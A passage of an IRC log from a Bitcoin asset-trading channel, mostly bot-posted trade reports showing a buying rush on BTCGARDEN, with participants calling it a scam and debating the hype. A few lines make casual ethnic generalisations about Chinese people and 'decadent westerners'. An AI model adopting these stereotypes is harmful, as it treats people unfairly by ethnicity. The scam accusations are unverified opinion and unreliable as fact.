0.016 = 8.416 BTC [+] Aug 03 11:43:33 [BTCTC] [ASICMINER-PT] 1 @ 3.854 BTC [+] Aug 03 11:43:34 wow btc garden hot property Aug 03 11:43:57 [BTCTC] [BTCGARDEN] 250 @ 0.016 = 4 BTC [+] Aug 03 11:43:59 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 03 11:44:00 [BTCTC] [ACTIVEMINING] 35 @ 0.005254 = 0.1839 BTC [-] Aug 03 11:44:08 [BTCTC] [BTCGARDEN] 222 @ 0.016 = 3.552 BTC [+] Aug 03 11:44:13 smidge you can take it pretty far. therer's a dearth of pretty much everything that;s market watching and reporting. Aug 03 11:44:14 [BTCTC] [TAT.MINIGAME] 1 @ 0.000247 BTC [-] Aug 03 11:44:23 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 11:44:27 chiefly because people join all excited, do something for a few weeks then abandon it. Aug 03 11:44:32 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 03 11:44:34 well said my man Aug 03 11:44:37 what is 'a lot of isk' mircea_popescu? from my logs, plato and klak1212 were interested in multi 10^9 or 10^10 deals in the past 12 months Aug 03 11:44:43 [BTCTC] [BTCGARDEN] 240 @ 0.016 = 3.84 BTC [+] Aug 03 11:44:54 random_cat that's exactly what it is. Aug 03 11:44:56 [BTCTC] [DMS.MINING] 1 @ 0.0114 BTC [-] Aug 03 11:45:11 and ty :p Aug 03 11:45:11 [BTCTC] [BTCGARDEN] 28 @ 0.016 = 0.448 BTC [+] Aug 03 11:45:23 [BTCTC] [LABCOIN] 24 @ 0.001819 = 0.0437 BTC [-] Aug 03 11:45:25 [BTCTC] [LABCOIN] 1 @ 0.001818 BTC [-] Aug 03 11:45:26 [BTCTC] [LABCOIN] 1000 @ 0.001817 = 1.817 BTC [-] Aug 03 11:45:31 ;;later tell plato hey, isk ? Aug 03 11:45:31 The operation succeeded. Aug 03 11:45:39 ;;later tell klak1212 hey, isk ? Aug 03 11:45:40 The operation succeeded. Aug 03 11:45:41 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 11:46:08 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 11:46:27 [BTCTC] [BTCGARDEN] 20 @ 0.016 = 0.32 BTC [+] Aug 03 11:46:33 [BTCTC] [BTCGARDEN] 116 @ 0.016 = 1.856 BTC [+] Aug 03 11:46:38 [BTCTC] [LABCOIN] 186 @ 0.001916 = 0.3564 BTC [+] Aug 03 11:46:39 [BTCTC] [LABCOIN] 33 @ 0.001918 = 0.0633 BTC [+] Aug 03 11:46:40 [BTCTC] [LABCOIN] 200 @ 0.001919 = 0.3838 BTC [+] Aug 03 11:46:41 [BTCTC] [LABCOIN] 101 @ 0.001926 = 0.1945 BTC [+] Aug 03 11:46:42 [BTCTC] [LABCOIN] 480 @ 0.001927 = 0.925 BTC [+] Aug 03 11:47:15 [BTCTC] [ACTIVEMINING] 88 @ 0.005256 = 0.4625 BTC [+] Aug 03 11:47:17 [BTCTC] [ACTIVEMINING] 134 @ 0.005255 = 0.7042 BTC [-] Aug 03 11:47:18 [BTCTC] [ACTIVEMINING] 50 @ 0.005253 = 0.2627 BTC [-] Aug 03 11:47:19 [BTCTC] [ACTIVEMINING] 1 @ 0.00525 BTC [-] Aug 03 11:47:28 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 11:47:48 [BTCTC] [DMS.SELLING] 12 @ 0.02426 = 0.2911 BTC [-] Aug 03 11:47:51 [BTCTC] [BTCGARDEN] 25 @ 0.016 = 0.4 BTC [+] Aug 03 11:47:55 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [+] Aug 03 11:48:52 [BTCTC] [BTCGARDEN] 25 @ 0.016 = 0.4 BTC [+] Aug 03 11:48:59 [BTCTC] [BTCGARDEN] 400 @ 0.016 = 6.4 BTC [+] Aug 03 11:49:02 [BTCTC] [BTCGARDEN] 85 @ 0.016 = 1.36 BTC [+] Aug 03 11:49:38 [BTCTC] [LABCOIN] 1 @ 0.001916 BTC [-] Aug 03 11:49:54 [BTCTC] [BTCGARDEN] 4998 @ 0.016 = 79.968 BTC [+] Aug 03 11:50:55 [BTCTC] [BTCGARDEN] 340 @ 0.016 = 5.44 BTC [+] Aug 03 11:51:10 [BTCTC] [BTCGARDEN] 1130 @ 0.016 = 18.08 BTC [+] Aug 03 11:51:42 [BTCTC] [BTCGARDEN] 730 @ 0.016 = 11.68 BTC [+] Aug 03 11:51:55 [BTCTC] [BTCGARDEN] 800 @ 0.016 = 12.8 BTC [+] Aug 03 11:52:09 [BTCTC] [BTCGARDEN] 27000 @ 0.016 = 432 BTC [+] Aug 03 11:52:15 [BTCTC] [BTCGARDEN] 323 @ 0.016 = 5.168 BTC [+] Aug 03 11:52:47 [BTCTC] [BTCGARDEN] 20 @ 0.016 = 0.32 BTC [+] Aug 03 11:53:06 [BTCTC] [BTCGARDEN] 30 @ 0.016 = 0.48 BTC [+] Aug 03 11:53:23 [BTCTC] [ACTIVEMINING] 25 @ 0.005266 = 0.1317 BTC [+] Aug 03 11:53:37 [BTCTC] [ACTIVEMINING] 399 @ 0.005266 = 2.1011 BTC [+] Aug 03 11:53:39 [BTCTC] [BTCGARDEN] 590 @ 0.016 = 9.44 BTC [+] Aug 03 11:53:40 [BTCTC] [ACTIVEMINING] 100 @ 0.005265 = 0.5265 BTC [-] Aug 03 11:53:42 [BTCTC] [BTCGARDEN] 3500 @ 0.016 = 56 BTC [+] Aug 03 11:53:43 [BTCTC] [ACTIVEMINING] 198 @ 0.005265 = 1.0425 BTC [-] Aug 03 11:53:45 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 11:53:47 [BTCTC] [ACTIVEMINING] 74 @ 0.005264 = 0.3895 BTC [-] Aug 03 11:53:48 [BTCTC] [ACTIVEMINING] 18 @ 0.005263 = 0.0947 BTC [-] Aug 03 11:53:49 [BTCTC] [ACTIVEMINING] 116 @ 0.00526 = 0.6102 BTC [-] Aug 03 11:53:58 [BTCTC] [BTCGARDEN] 62 @ 0.016 = 0.992 BTC [+] Aug 03 11:54:01 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 03 11:54:04 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 03 11:54:19 [BTCTC] [BTCGARDEN] 7 @ 0.016 = 0.112 BTC [+] Aug 03 11:54:23 [BTCTC] [BTCGARDEN] 370 @ 0.016 = 5.92 BTC [+] Aug 03 11:54:26 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 11:54:38 Wall getting close to coming down Aug 03 11:54:47 [BTCTC] [BTCGARDEN] 5 @ 0.016 = 0.08 BTC [+] Aug 03 11:54:59 [BTCTC] [BTCGARDEN] 375 @ 0.016 = 6 BTC [+] Aug 03 11:55:01 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 03 11:55:21 ok... i see what btc garden is... but why the excitement? avalon is already offering a superior product (of limited supply) Aug 03 11:55:21 [BTCTC] [BTCGARDEN] 63 @ 0.016 = 1.008 BTC [+] Aug 03 11:55:34 [BTCTC] [BTCGARDEN] 73 @ 0.016 = 1.168 BTC [+] Aug 03 11:55:37 [BTCTC] [BTCGARDEN] 845 @ 0.016 = 13.52 BTC [+] Aug 03 11:55:57 [BTCTC] [ASICMINER-PT] 1 @ 3.89 BTC [+] Aug 03 11:56:15 [BTCTC] [BTCGARDEN] 25 @ 0.016 = 0.4 BTC [+] Aug 03 11:56:20 [BTCTC] [BTCGARDEN] 305 @ 0.016 = 4.88 BTC [+] Aug 03 11:56:34 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 11:56:57 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 11:57:08 [BTCTC] [BTCGARDEN] 250 @ 0.016 = 4 BTC [+] Aug 03 11:57:11 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 03 11:57:31 [BTCTC] [BTCGARDEN] 33 @ 0.016 = 0.528 BTC [+] Aug 03 11:57:57 [BTCTC] [BTCGARDEN] 250 @ 0.016 = 4 BTC [+] Aug 03 11:57:58 random_cat no excitement whatsoever. there's a couple of scammer assets being pushed by anons. Aug 03 11:57:58 http://trilema.com/2013/the-anatomy-of-a-scam/ Aug 03 11:58:02 The anatomy of a scam. pe Trilema - Un blog de Mircea Popescu. Aug 03 11:58:08 [BTCTC] [BTCGARDEN] 563 @ 0.016 = 9.008 BTC [+] Aug 03 11:58:31 [BTCTC] [TAT.MINIGAME] 1 @ 0.000268 BTC [+] Aug 03 11:58:41 [HAVELOCK] [VTX] 1 @ 0.4599 BTC [+] Aug 03 11:58:44 [HAVELOCK] [VTX] 2 @ 0.4513 = 0.9026 BTC [-] Aug 03 11:58:47 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 11:58:49 [BTCTC] [BTCGARDEN] 15 @ 0.016 = 0.24 BTC [+] Aug 03 11:58:51 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 11:59:26 [BTCTC] [BTCGARDEN] 12000 @ 0.016 = 192 BTC [+] Aug 03 11:59:43 1.5k to go Aug 03 11:59:44 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 03 11:59:46 [BTCTC] [ASICMINER-PT] 1 @ 3.859 BTC [-] Aug 03 11:59:47 [BTCTC] [ACTIVEMINING] 73 @ 0.005262 = 0.3841 BTC [+] Aug 03 11:59:53 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 11:59:54 [BTCTC] [ACTIVEMINING] 36 @ 0.005261 = 0.1894 BTC [-] Aug 03 11:59:55 [BTCTC] [ACTIVEMINING] 584 @ 0.00526 = 3.0718 BTC [-] Aug 03 11:59:57 [BTCTC] [ACTIVEMINING] 107 @ 0.005201 = 0.5565 BTC [-] Aug 03 12:00:23 [BTCTC] [LABCOIN] 593 @ 0.001916 = 1.1362 BTC [-] Aug 03 12:00:37 [BTCTC] [LABCOIN] 207 @ 0.001916 = 0.3966 BTC [-] Aug 03 12:00:39 [BTCTC] [LABCOIN] 593 @ 0.001916 = 1.1362 BTC [-] Aug 03 12:00:41 [BTCTC] [LABCOIN] 2407 @ 0.001927 = 4.6383 BTC [+] Aug 03 12:00:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.037 BTC [+] Aug 03 12:00:42 [BTCTC] [TAT.ASICMINER] 14 @ 0.037 = 0.518 BTC [+] Aug 03 12:00:55 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 12:00:57 [BTCTC] [BTCGARDEN] 1500 @ 0.016 = 24 BTC [+] Aug 03 12:00:59 [BTCTC] [TAT.ASICMINER] 40 @ 0.0367 = 1.468 BTC [-] Aug 03 12:01:01 [BTCTC] [TAT.ASICMINER] 20 @ 0.0367 = 0.734 BTC [-] Aug 03 12:01:18 [BTCTC] [BTCGARDEN] 71 @ 0.016 = 1.136 BTC [+] Aug 03 12:01:19 [BTCTC] [ASICMINER-PT] 1 @ 3.855 BTC [-] Aug 03 12:01:51 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 12:01:52 [BTCTC] [BTCGARDEN] 170 @ 0.016 = 2.72 BTC [+] Aug 03 12:01:57 [BTCTC] [ACTIVEMINING] 10 @ 0.005495 = 0.055 BTC [+] Aug 03 12:01:58 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 12:02:12 [BTCTC] [BTCGARDEN] 45 @ 0.016 = 0.72 BTC [+] Aug 03 12:02:24 [BTCTC] [BTCGARDEN] 188 @ 0.016 = 3.008 BTC [+] Aug 03 12:02:30 [BTCTC] [BTCGARDEN] 9 @ 0.016 = 0.144 BTC [+] Aug 03 12:03:07 [BTCTC] [BTCGARDEN] 560 @ 0.016 = 8.96 BTC [+] Aug 03 12:03:14 [BTCTC] [BTCGARDEN] 400 @ 0.016 = 6.4 BTC [+] Aug 03 12:03:29 [BTCTC] [BTCGARDEN] 40 @ 0.016 = 0.64 BTC [+] Aug 03 12:03:44 btcgarden in particular is a lulzcase, with its blog full of pictures stolen off the internet. Aug 03 12:03:56 [BTCTC] [BTCGARDEN] 618 @ 0.016 = 9.888 BTC [+] Aug 03 12:04:13 [BTCTC] [LABCOIN] 5 @ 0.001925 = 0.0096 BTC [-] Aug 03 12:04:15 likely stock images Aug 03 12:04:27 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 03 12:04:29 [BTCTC] [LABCOIN] 10 @ 0.001925 = 0.0193 BTC [-] Aug 03 12:04:37 [BTCTC] [LABCOIN] 1 @ 0.001925 BTC [-] Aug 03 12:05:03 haha yea Aug 03 12:05:19 but well, keep in mind Aug 03 12:05:20 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 12:05:27 they are chinese, we are not Aug 03 12:05:34 [BTCTC] [BTCGARDEN] 1875 @ 0.016 = 30 BTC [+] Aug 03 12:05:36 [BTCTC] [COGNITIVE] 1 @ 0.366 BTC [-] Aug 03 12:05:38 [BTCTC] [COGNITIVE] 5 @ 0.359 = 1.795 BTC [-] Aug 03 12:05:38 different mentality etc. Aug 03 12:05:40 [BTCTC] [BTCGARDEN] 13 @ 0.016 = 0.208 BTC [+] Aug 03 12:05:51 [BTCTC] [BTCGARDEN] 450 @ 0.016 = 7.2 BTC [+] Aug 03 12:06:12 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 12:06:19 decadent westerners don't understand Aug 03 12:06:44 [BTCTC] [BTCGARDEN] 135 @ 0.016 = 2.16 BTC [+] Aug 03 12:07:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.03693 = 0.0739 BTC [+] Aug 03 12:07:24 [BTCTC] [TAT.ASICMINER] 3 @ 0.0367 = 0.1101 BTC [-] Aug 03 12:07:25 [BTCTC] [ASICMINER-PT] 1 @ 3.856 BTC [+] Aug 03 12:07:39 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 12:07:48 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 03 12:07:49 [BTCTC] [LABCOIN] 1875 @ 0.001825 = 3.4219 BTC [-] Aug 03 12:07:51 [BTCTC] [LABCOIN] 294 @ 0.001823 = 0.536 BTC [-] Aug 03 12:07:53 hehe yes, something like that Aug 03 12:07:55 [BTCTC] [LABCOIN] 49 @ 0.001822 = 0.0893 BTC [-] Aug 03 12:07:57 [BTCTC] [LABCOIN] 1 @ 0.001821 BTC [-] Aug 03 12:07:58 [BTCTC] [LABCOIN] 271 @ 0.001819 = 0.4929 BTC [-] Aug 03 12:07:59 [BTCTC] [LABCOIN] 1000 @ 0.001819 = 1.819 BTC [-] Aug 03 12:07:59 its because decadent westerners want to make a profit without caring Aug 03 12:08:00 [BTCTC] [LABCOIN] 30 @ 0.001818 = 0.0545 BTC [-] Aug 03 12:08:00 [BTCTC] [LABCOIN] 2418 @ 0.001818 = 4.3959 BTC [-] Aug 03 12:08:05 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 12:08:07 they, too Aug 03 12:08:10 i'm very sure of that Aug 03 12:08:14 [BTCTC] [BTCGARDEN] 4 @ 0.016 = 0.064 BTC [+] Aug 03 12:08:16 [BTCTC] [BTCGARDEN] 240 @ 0.016 = 3.84 BTC [+] Aug 03 12:08:26 thats what unites them all, huh Aug 03 12:08:35 [BTCTC] [ACTIVEMINING] 25 @ 0.005203 = 0.1301 BTC [-] Aug 03 12:08:49 [BTCTC] [ACTIVEMINING] 30 @ 0.005202 = 0.1561 BTC [-] Aug 03 12:09:14 [BTCTC] [ACTIVEMINING] 93 @ 0.005201 = 0.4837 BTC [-] Aug 03 12:09:21 hmmm... the there will be blood bet seems to most interesting part Aug 03 12:09:41 [BTCTC] [COGNITIVE] 1 @ 0.42 BTC [+] Aug 03 12:10:08 [BTCTC] [COGNITIVE] 1 @ 0.42 BTC [+] Aug 03 12:10:14 [BTCTC] [BTCGARDEN] 3500 @ 0.016 = 56 BTC [+] Aug 03 12:10:15 [BTCTC] [LABCOIN] 1000 @ 0.001826 = 1.826 BTC [+] Aug 03 12:10:15 random_cat something;'s gotta break. i mean, activemining is exactly reobek to am Aug 03 12:10:27 this will keep going indefinitely, because of the illusion of easy money. Aug 03 12:10:33 [BTCTC] [ACTIVEMINING] 300 @ 0.0052 = 1.56 BTC [-] Aug 03 12:10:37 much like spamming is still going 20 years later in spite of the avg spammer making a loss. Aug 03 12:10:44 [BTCTC] [COGNITIVE] 15 @ 0.35 = 5.25 BTC [-] Aug 03 12:10:46 [BTCTC] [BTCGARDEN] 672 @ 0.016 = 10.752 BTC [+] Aug 03 12:10:57 [BTCTC] [ACTIVEMINING] 200 @ 0.0052 = 1.04 BTC [-] Aug 03 12:11:01 [BTCTC] [BTCGARDEN] 310 @ 0.016 = 4.96 BTC [+] Aug 03 12:11:07 [BTCTC] [ACTIVEMINING] 15 @ 0.0052 = 0.078 BTC [-] Aug 03 12:11:21 [BTCTC] [LABCOIN] 2009 @ 0.001818 = 3.6524 BTC [-] Aug 03 12:11:33 [BTCTC] [LABCOIN] 40 @ 0.001921 = 0.0768 BTC [+] Aug 03 12:11:39 [BTCTC] [BTCGARDEN] 130 @ 0.016 = 2.08 BTC [+] Aug 03 12:11:48 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 12:11:51 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 12:12:13 [BTCTC] [BTCGARDEN] 108 @ 0.016 = 1.728 BTC [+] Aug 03 12:12:15 [BTCTC] [ACTIVEMINING] 985 @ 0.0052 = 5.122 BTC [-] Aug 03 12:12:26 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [+] Aug 03 12:12:26 [BTCTC] [LABCOIN] 1 @ 0.001819 BTC [-] Aug 03 12:12:37 [BTCTC] [BTCGARDEN] 468 @ 0.016 = 7.488 BTC [+] Aug 03 12:12:42 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 12:12:45 [BTCTC] [BTCGARDEN] 341 @ 0.016 = 5.456 BTC [+] Aug 03 12:12:56 [BTCTC] [ACTIVEMINING] 15 @ 0.005109 = 0.0766 BTC [-] Aug 03 12:12:59 [BTCTC] [BTCGARDEN] 530 @ 0.016 = 8.48 BTC [+] Aug 03 12:13:39 [BTCTC] [BTCGARDEN] 1558 @ 0.016 = 24.928 BTC [+] Aug 03 12:14:15 [BTCTC] [BTCGARDEN] 416 @ 0.016 = 6.656 BTC [+] Aug 03 12:14:37 [BTCTC] [LABCOIN] 42 @ 0.001821 = 0.0765 BTC [+] Aug 03 12:15:11 [BTCTC] [ACTIVEMINING] 2 @ 0.005483 = 0.011 BTC [+] Aug 03 12:16:27 [BTCTC] [BTCGARDEN] 14000 @ 0.016 = 224 BTC [+] Aug 03 12:16:34 [BTCTC] [LABCOIN] 59 @ 0.00182 = 0.1074 BTC [-] Aug 03 12:16:35 [BTCTC] [LABCOIN] 299 @ 0.001821 = 0.5445 BTC [+] Aug 03 12:16:39 [BTCTC] [BTCGARDEN] 4 @ 0.016 = 0.064 BTC [+] Aug 03 12:16:42 [BTCTC] [ASICMINER-PT] 1 @ 3.855 BTC [-] Aug 03 12:16:44 [BTCTC] [ASICMINER-PT] 1 @ 3.855 BTC [-] Aug 03 12:17:06 [BTCTC] [BTCGARDEN] 450 @ 0.016 = 7.2 BTC [+] Aug 03 12:17:07 [BTCTC] [LABCOIN] 59 @ 0.001821 = 0.1074 BTC [+] Aug 03 12:17:13 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 12:17:22 [BTCTC] [BTCGARDEN] 34 @ 0.016 = 0.544 BTC [+] Aug 03 12:17:36 [BTCTC] [ASICMINER-PT] 4 @ 3.852 = 15.408 BTC [-] Aug 03 12:17:38 [BTCTC] [LABCOIN] 59 @ 0.001821 = 0.1074 BTC [+] Aug 03 12:17:39 [BTCTC] [LABCOIN] 300 @ 0.00182 = 0.546 BTC [-] Aug 03 12:17:40 [BTCTC] [BTCGARDEN] 140 @ 0.016 = 2.24 BTC [+] Aug 03 12:17:41 [BTCTC] [LABCOIN] 299 @ 0.001819 = 0.5439 BTC [-] Aug 03 12:17:43 [BTCTC] [LABCOIN] 1720 @ 0.001816 = 3.1235 BTC [-] Aug 03 12:17:44 [BTCTC] [LABCOIN] 500 @ 0.001812 = 0.906 BTC [-] Aug 03 12:17:45 [BTCTC] [LABCOIN] 55 @ 0.001811 = 0.0996 BTC [-] Aug 03 12:17:46 [BTCTC] [BTCGARDEN] 3 @ 0.016 = 0.048 BTC [+] Aug 03 12:17:47 [BTCTC] [LABCOIN] 200 @ 0.001811 = 0.3622 BTC [-] Aug 03 12:17:49 [BTCTC] [BTCGARDEN] 201 @ 0.016 = 3.216 BTC [+] Aug 03 12:17:50 [BTCTC] [LABCOIN] 1088 @ 0.00181 = 1.9693 BTC [-] Aug 03 12:17:50 [BTCTC] [LABCOIN] 100 @ 0.00181 = 0.181 BTC [-] Aug 03 12:17:51 [BTCTC] [LABCOIN] 500 @ 0.001807 = 0.9035 BTC [-] Aug 03 12:17:53 [BTCTC] [LABCOIN] 32 @ 0.001803 = 0.0577 BTC [-] Aug 03 12:17:54 [BTCTC] [BTCGARDEN] 7200 @ 0.016 = 115.2 BTC [+] Aug 03 12:17:55 [BTCTC] [LABCOIN] 55 @ 0.001802 = 0.0991 BTC [-] Aug 03 12:17:56 [BTCTC] [LABCOIN] 100 @ 0.001802 = 0.1802 BTC [-] Aug 03 12:17:58 [BTCTC] [BTCGARDEN] 900 @ 0.016 = 14.4 BTC [+] Aug 03 12:17:59 [BTCTC] [LABCOIN] 1982 @ 0.001802 = 3.5716 BTC [-] Aug 03 12:18:16 [BTCTC] [BTCGARDEN] 7 @ 0.016 = 0.112 BTC [+] Aug 03 12:18:19 [BTCTC] [BTCGARDEN] 80 @ 0.016 = 1.28 BTC [+] Aug 03 12:18:20 [BTCTC] [BTCGARDEN] 36 @ 0.016 = 0.576 BTC [+] Aug 03 12:18:23 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 12:18:30 [BTCTC] [ASICMINER-PT] 1 @ 3.852 BTC [-] Aug 03 12:18:46 [BTCTC] [BTCGARDEN] 786 @ 0.016 = 12.576 BTC [+] Aug 03 12:18:47 [BTCTC] [ACTIVEMINING] 400 @ 0.00511 = 2.044 BTC [-] Aug 03 12:18:49 here is a bit of trouble i have with bitbet: the nature of the weight evolution is unclear to me. Aug 03 12:18:53 [BTCTC] [BTCGARDEN] 90 @ 0.016 = 1.44 BTC [+] Aug 03 12:18:54 y u spam scams assbot Aug 03 12:18:54 [BTCTC] [BTCGARDEN] 30 @ 0.016 = 0.48 BTC [+] Aug 03 12:19:02 [BTCTC] [BTCGARDEN] 240 @ 0.016 = 3.84 BTC [+] Aug 03 12:19:24 [BTCTC] [BTCGARDEN] 3234 @ 0.016 = 51.744 BTC [+] Aug 03 12:19:35 do tell ? Aug 03 12:19:38 [BTCTC] [BTCGARDEN] 120 @ 0.016 = 1.92 BTC [+] Aug 03 12:19:47 [BTCTC] [BTCGARDEN] 80 @ 0.016 = 1.28 BTC [+] Aug 03 12:19:59 [BTCTC] [ASICMINER-PT] 1 @ 3.853 BTC [+] Aug 03 12:20:34 [BTCTC] [BTCGARDEN] 240 @ 0.016 = 3.84 BTC [+] Aug 03 12:20:41 it simply decreases liniarly with time Aug 03 12:20:50 aha! Aug 03 12:20:53 liniarly? Aug 03 12:21:02 [BTCTC] [BTCGARDEN] 3000 @ 0.016 = 48 BTC [+] Aug 03 12:21:04 linneausly Aug 03 12:21:08 everything tanking btcgarden going mad Aug 03 12:21:32 [BTCTC] [BTCGARDEN] 1350 @ 0.016 = 21.6 BTC [+] Aug 03 12:21:38 [BTCTC] [BTCGARDEN] 370 @ 0.016 = 5.92 BTC [+] Aug 03 12:21:59 userioao hatir. Aug 03 12:22:00 [BTCTC] [BTCGARDEN] 175 @ 0.016 = 2.8 BTC [+] Aug 03 12:22:15 [BTCTC] [ASICMINER-PT] 6 @ 3.854 = 23.124 BTC [+] Aug 03 12:22:18 [BTCTC] [ASICMINER-PT] 1 @ 3.853 BTC [-] Aug 03 12:22:27 The speed of BTCgarden buying has reall sped up Aug 03 12:22:28 moran Aug 03 12:22:38 [BTCTC] [BTCGARDEN] 1875 @ 0.016 = 30 BTC [+] Aug 03 12:22:39 makes sense as were about to breach Aug 03 12:22:41 [BTCTC] [BTCGARDEN] 7 @ 0.016 = 0.112 BTC [+] Aug 03 12:22:55 https://btct.co/security/LABCOIN Purchase History Approx profit: ฿ -62.5085627 Aug 03 12:23:17 [BTCTC] [BTCGARDEN] 1280 @ 0.016 = 20.48 BTC [+] Aug 03 12:23:25 everyone cashout quick to jump on the btcgrden Aug 03 12:23:29 [BTCTC] [BTCGARDEN] 1600 @ 0.016 = 25.6 BTC [+] Aug 03 12:23:31 [BTCTC] [ASICMINER-PT] 2 @ 3.852 = 7.704 BTC [-] Aug 03 12:23:32 [BTCTC] [ASICMINER-PT] 3 @ 3.851 = 11.553 BTC [-] Aug 03 12:23:33 [BTCTC] [LABCOIN] 5 @ 0.001803 = 0.009 BTC [+] Aug 03 12:23:35 [BTCTC] [LABCOIN] 495 @ 0.001802 = 0.892 BTC [-] Aug 03 12:23:46 whats so special about btcgarden Aug 03 12:23:52 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 12:24:04 [BTCTC] [BASIC-MINING] 3 @ 0.35 = 1.05 BTC [-] Aug 03 12:24:10 [HAVELOCK] [AM1] 1 @ 3.98 BTC [+] Aug 03 12:24:12 [HAVELOCK] [AM1] 1 @ 3.96 BTC [-] Aug 03 12:24:13 internet hype machine Aug 03 12:24:14 [HAVELOCK] [AM1] 1 @ 3.92 BTC [-] Aug 03 12:24:16 [HAVELOCK] [AM1] 1 @ 3.906 BTC [-] Aug 03 12:24:17 [HAVELOCK] [AM1] 1 @ 3.905 BTC [-] Aug 03 12:24:29 [BTCTC] [BTCGARDEN] 1150 @ 0.016 = 18.4 BTC [+] Aug 03 12:24:35 [BTCTC] [ASICMINER-PT] 10 @ 3.85 = 38.5 BTC [-] Aug 03 12:24:41 [BTCTC] [BTCGARDEN] 56 @ 0.016 = 0.896 BTC [+] Aug 03 12:24:42 [BTCTC] [ASICMINER-PT] 33 @ 3.85 = 127.05 BTC [-] Aug 03 12:24:46 [BTCTC] [BTCGARDEN] 65 @ 0.016 = 1.04 BTC [+] Aug 03 12:24:49 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 03 12:24:49 it has a nice garden? Aug 03 12:25:17 chinese overlords ofc Aug 03 12:25:26 [BTCTC] [LABCOIN] 523 @ 0.001802 = 0.9424 BTC [-] Aug 03 12:25:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.037 BTC [+] Aug 03 12:25:46 [BTCTC] [BTCGARDEN] 1400 @ 0.016 = 22.4 BTC [+] Aug 03 12:26:01 [BTCTC] [TAT.ASICMINER] 28 @ 0.037 = 1.036 BTC [+] Aug 03 12:26:04 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 12:26:05 [BTCTC] [LABCOIN] 3025 @ 0.001802 = 5.4511 BTC [-] Aug 03 12:26:14 [BTCTC] [BTCGARDEN] 3230 @ 0.016 = 51.68 BTC [+] Aug 03 12:26:16 [BTCTC] [LABCOIN] 500 @ 0.001801 = 0.9005 BTC [-] Aug 03 12:26:17 [BTCTC] [LABCOIN] 2000 @ 0.0018 = 3.6 BTC [-] Aug 03 12:26:18 [BTCTC] [BTCGARDEN] 45 @ 0.016 = 0.72 BTC [+] Aug 03 12:26:19 [BTCTC] [LABCOIN] 859 @ 0.0018 = 1.5462 BTC [-] Aug 03 12:26:31 [BTCTC] [BTCGARDEN] 130 @ 0.016 = 2.08 BTC [+] Aug 03 12:26:49 [BTCTC] [BTCGARDEN] 311 @ 0.016 = 4.976 BTC [+] Aug 03 12:26:51 [BTCTC] [BTCGARDEN] 2490 @ 0.016 = 39.84 BTC [+] Aug 03 12:26:54 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 12:26:55 [BTCTC] [LABCOIN] 250 @ 0.00181 = 0.4525 BTC [+] Aug 03 12:26:58 [BTCTC] [BTCGARDEN] 998 @ 0.016 = 15.968 BTC [+] Aug 03 12:26:59 [BTCTC] [LABCOIN] 250 @ 0.0018 = 0.45 BTC [-] Aug 03 12:27:16 any news on btcgarden? last one i heard were the usb miners Aug 03 12:27:23 [BTCTC] [BASIC-MINING] 1 @ 0.3878 BTC [+] Aug 03 12:27:36 [BTCTC] [BTCGARDEN] 49 @ 0.016 = 0.784 BTC [+] Aug 03 12:27:50 [BTCTC] [LABCOIN] 1891 @ 0.0018 = 3.4038 BTC [-] Aug 03 12:27:51 [BTCTC] [LABCOIN] 1109 @ 0.0018 = 1.9962 BTC [-] Aug 03 12:27:51 31k left Aug 03 12:28:08 [BTCTC] [LABCOIN] 1526 @ 0.0018 = 2.7468 BTC [-] Aug 03 12:28:09 [BTCTC] [LABCOIN] 106 @ 0.0018 = 0.1908 BTC [-] Aug 03 12:28:11 [BTCTC] [LABCOIN] 